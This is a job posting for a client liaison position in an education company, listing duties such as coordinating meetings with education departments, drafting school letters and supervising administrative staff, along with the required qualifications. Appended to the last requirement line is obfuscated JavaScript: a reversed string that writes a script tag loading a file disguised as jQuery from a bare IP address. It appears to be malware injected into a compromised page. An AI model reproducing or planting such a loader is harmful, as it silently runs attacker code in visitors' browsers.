Industry : Education
Reporting To : GM, Education Operations
General Job Accountabilities:
– Link between Clients and relevant Divisions/Departments within the Company in relaying Clients’ needs and requests.
– Create and maintain good rapport with the Clients and establish good relationship with Divisions/Departments within the Company.
– Ensure effective verbal and written communication and co-operation with Clients and relevant Divisions/Departments within the Company.
– Co-ordination of Operational Meetings with Clients on behalf of EOD.
– Meet/liaise with JPNs, PPDs periodically on TSP Implementation and in communicating CPD information to schools.
– Effective and efficient communication of information/action required, between YA and relevant parties within LE pertaining to TSP implementation
– Co-ordination of YA-LE TSP Operational meetings on behalf of EOD, draft/review minutes and Feedback Form, circulate minutes and follow-up on action required for reporting to Client.
– Effective and efficient communication of information/action required, between Other Clients and relevant parties within LE pertaining to project implementation
– Attend JPN TSP Management Meetings, Technical (Sub-Committee) Meetings and YA TS Conference Meetings, On-Boarding Meetings with YA, MOE, JPNs, PPDs and Schools as and when required. Draft and circulate minutes of meetings to internal and/or external meeting attendees as and when required.
– Drafting and/or reviewing of school notification letters on CPDs and other relevant initiatives/activities for YA’s circulation. Communication of letter content to ELs and other relevant LE representatives.
– Work with YA in drafting and issuing letters of appointment for AT & ML under the MidLED Framwork and undertake payment processing and verification, with assistance from the Finance team and the Data and Programme Reporting unit.
– Supervise Unit’s administrative functions (letter, meeting minutes distribution, filing etc)
– Provide on the job training to Client Liaison Executive to take on responsibilities associated with Unit’s functions and provide guidance to Administrative Executive to take on routine communication roles, co-ordination of CPD letter drafting, circulation and filing.
– Encourage high performance culture within Unit
– Undertake any other duties as assigned by GM EOD or any other Divisions/Department
– Minimum a Bachelor Degree with in Communication or Project Management.
– Minimum 5 years’ experience in Project Management, preferably in the education industry.
– Good organisational skills and strong written and oral communication skills.
– A team player, trustworthy and ambitious but also self-motivated and independent.
– Strong interpersonal skills and is also friendly.
– Administration skills and a mental aptitude for industrial growth, business development and public relations.
– A good communicator and should be friendly and level headed.
– Must be knowledgeable about the business area of the organisation document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))